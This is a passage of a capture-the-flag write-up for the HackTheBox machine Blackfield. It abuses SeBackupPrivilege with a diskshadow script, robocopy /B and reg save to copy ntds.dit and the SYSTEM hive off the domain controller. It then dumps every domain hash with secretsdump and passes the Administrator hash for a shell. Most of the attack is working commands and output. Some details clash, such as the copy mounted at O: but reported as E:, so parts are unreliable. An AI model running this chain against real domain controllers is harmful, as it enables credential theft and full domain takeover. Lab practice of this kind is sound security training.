*Evil-WinRM* PS C:\Users\svc_backup\Documents>
Check what this account carries:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
svc_backup is a member of Backup Operators and holds SeBackupPrivilege and SeRestorePrivilege. With the backup privilege the OS skips ACL checks on reads, so we can read anything on the DC, including ntds.dit (the AD database, normally held open by the directory service) and the SYSTEM hive, and extract every domain hash offline:
Privilege Escalation:
Diskshadow & robocopy:
diskshadow is the command-line front end to the Volume Shadow Copy Service: it takes a point-in-time snapshot of a volume, which is how we get at ntds.dit while the live copy is locked by the directory service. robocopy with /B (backup mode) copies using SeBackupPrivilege, so the restrictive ACL on the NTDS folder does not stop us.
This diskshadow script does the snapshot:
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% O:
end backup
Line by line: set metadata writes the backup metadata (writer state, shadow copy IDs) into meta.cab. set context chooses how long the shadow copy lives; clientaccessible and persistent are both persistent variants and the second set context line supersedes the first, so the copy survives diskshadow exiting and a reboot instead of being discarded when the session ends. begin backup tells the VSS writers (including the NTDS writer) to bring their data into a consistent state for a backup. add volume C: alias cdrive adds the C: volume to the shadow copy set under the alias cdrive, create takes the snapshot, expose %cdrive% O: mounts the snapshot at drive letter O: so it can be browsed like a normal drive, and end backup closes the backup session.
Clean-up is not shown on this page; once finished, diskshadow's unexpose O: and delete shadows all remove the exposed copy again, which is the polite thing to do on a client's DC.
So lets upload that script to the target machine:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload backup_script.txt
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Blackfield/backup_script.txt to C:\Users\svc_backup\Documents\backup_script.txt
Data: 240 bytes of 240 bytes copied
Info: Upload successful!
diskshadow /s runs the script non-interactively. Because the shadow copy is a snapshot of the whole volume, files that are open on the live system, ntds.dit included, can be read from it:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s backup_script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/10/2025 2:53:32 PM
-> set verbose o
SET VERBOSE { ON | OFF }
ON Turn on verbose mode. This provides information about writer inclusion/exclusion.
OFF Turn off verbose mode.
Example: SET VERBOSE ON
It stopped on the first line, which diskshadow read as set verbose o: the final character of the line was lost, so it printed the usage text for the unrecognised option and went no further. The script was written on Linux with LF line endings, while diskshadow expects CRLF, so the fix is to convert the line endings with unix2dos:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ unix2dos backup_script.txt
unix2dos: converting file backup_script.txt to DOS format...
Upload the converted file and run it again:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload backup_script.txt
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Blackfield/backup_script.txt to C:\Users\svc_backup\Documents\backup_script.txt
Data: 252 bytes of 252 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s backup_script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/10/2025 2:25:19 PM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,
because it requires volume which is not in the shadow copy set.
The writer "ASR Writer" is now entirely excluded from the backup because the top-level
non selectable component "\BCD\BCD" is excluded.
* Including writer "Task Scheduler Writer":
+ Adding component: \TasksStore
* Including writer "VSS Metadata Store Writer":
+ Adding component: \WriterMetadataStore
* Including writer "Performance Counters Writer":
+ Adding component: \PerformanceCounters
* Including writer "System Writer":
+ Adding component: \System Files
+ Adding component: \Win32 Services Files
* Including writer "NTDS":
+ Adding component: \C:_Windows_NTDS\ntds
<snipped>
Inserted file DisF0A0.tmp into .cab file meta.cab
Querying all shadow copies with the shadow copy set ID {95596a49-37ff-4fa5-b470-64bd949f4986}
* Shadow copy ID = {73972dbd-d7e7-4eb8-bbaf-ab0ad7cefea3} %cdrive%
- Shadow copy set: {95596a49-37ff-4fa5-b470-64bd949f4986} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/10/2025 2:25:38 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %cdrive% O:
-> %cdrive% = {73972dbd-d7e7-4eb8-bbaf-ab0ad7cefea3}
The shadow copy was successfully exposed as E:\.
-> end backup
This time the script runs through: the NTDS writer is included, the snapshot is created and exposed as a drive letter.
Now robocopy copies ntds.dit out of the snapshot on O:. The /B switch is the important part: it opens the file in backup mode, which uses SeBackupPrivilege to bypass the ACL on the NTDS folder:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> robocopy /b O:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Wednesday, September 10, 2025 2:29:33 PM
Source : O:\Windows\ntds\
Dest : C:\Users\svc_backup\Documents\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 O:\Windows\ntds\
New File 18.0 m ntds.dit
0.0%
0.3%
0.6%
1.0%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 18.00 m 18.00 m 0 0 0 0
Times : 0:00:01 0:00:01 0:00:00 0:00:00
Speed : 12450110 Bytes/sec.
Speed : 712.401 MegaBytes/min.
Ended : Wednesday, September 10, 2025 2:29:34 PM
ntds.dit alone is not enough: the hashes inside it are encrypted with the password encryption key (PEK), which is itself protected by the boot key stored in the SYSTEM registry hive. reg save exports the hive, again thanks to the backup privilege:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system
The operation completed successfully.
Download both files to the Kali VM:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system
Info: Downloading C:\Users\svc_backup\Documents\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
Info: Downloading C:\Users\svc_backup\Documents\ntds.dit to ntds.dit
Info: Download successful!
impacket-secretsdump with the local option parses the offline copy: it pulls the boot key from SYSTEM, decrypts the PEK, and decrypts every hash in ntds.dit:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:777b3a5045eaccfd325fabcd12450c45:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c1f85538675d6cba8c4307b1d37d0a19:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
<snipped>
[*] Cleaning up...
That is every NT hash in the domain, Administrator's included. NTLM authentication only needs the hash, not the password, so we can pass it directly; I use impacket-wmiexec for that.
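Before pivoting, a quick offline triage of the dump, as an added example (my code, not the original writeup's): it parses secretsdump's name:rid:lmhash:nthash::: lines and reports accounts with an empty password, accounts still carrying an LM hash, and groups of accounts that share one NT hash, which is how password reuse between an admin and a throwaway account shows up. The sample reuses the five account lines printed above plus two constructed accounts (helpdesk_tmp, legacy_svc) added only to trigger the reuse and LM findings.

```python
import re
from collections import defaultdict
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM half when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# secretsdump NTDS line: [domain\]name:rid:lmhash:nthash:::
_LINE = re.compile(r"^(?:[^\\:]+\\)?([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")


def parse_secretsdump(text: str) -> List[dict]:
    """Return one dict per account line; [*] status lines and anything else are skipped."""
    rows = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            name, rid, lm, nt = m.groups()
            rows.append({"name": name, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return rows


def triage(rows: List[dict]) -> Dict[str, list]:
    """Findings worth pulling from a dumped NTDS before using any of the hashes."""
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["name"])
    return {
        # empty NT hash: the account has no password at all (Guest here)
        "empty_password": [r["name"] for r in rows if r["nt"] == EMPTY_NT],
        # a stored LM hash means the password is 14 chars or less and trivially crackable
        "lm_hash_present": [r["name"] for r in rows if r["lm"] != EMPTY_LM],
        # same NT hash on several accounts: password reuse, often admin vs. service account
        "shared_nt_hash": sorted(sorted(names) for nt, names in by_nt.items()
                                 if len(names) > 1 and nt != EMPTY_NT),
        "machine_accounts": [r["name"] for r in rows if r["name"].endswith("$")],
    }


# Five lines from the dump above plus two constructed accounts (helpdesk_tmp reuses the
# Administrator hash; legacy_svc carries a constructed non-empty LM half).
SAMPLE = """\
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:777b3a5045eaccfd325fabcd12450c45:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c1f85538675d6cba8c4307b1d37d0a19:::
BLACKFIELD.local\\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
helpdesk_tmp:1500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
legacy_svc:1501:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for finding, hits in triage(parse_secretsdump(SAMPLE)).items():
        print(f"{finding:<18} {hits}")
```

On a real engagement the shared-hash list is usually the most valuable line of the report: it turns one dumped file into a concrete password-reuse finding without cracking anything.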
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-wmiexec blackfield.local/administrator@10.129.229.17 -hashes :184fb5e5178480be64824d4cd53b99ee
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
blackfield\administrator
C:\>hostname
DC01
C:\>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::4d21:4c29:78b9:aa3d
Link-local IPv6 Address . . . . . : fe80::4d21:4c29:78b9:aa3d%17
IPv4 Address. . . . . . . . . . . : 10.129.229.17
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
And we can read the flags:
C:\>type C:\Users\Administrator\Desktop\root.txt
4375a629c7c67c8e29db269060c955cb
C:\>type C:\Users\svc_backup\Desktop\user.txt
3920bb317a0bef51027e2852be64b543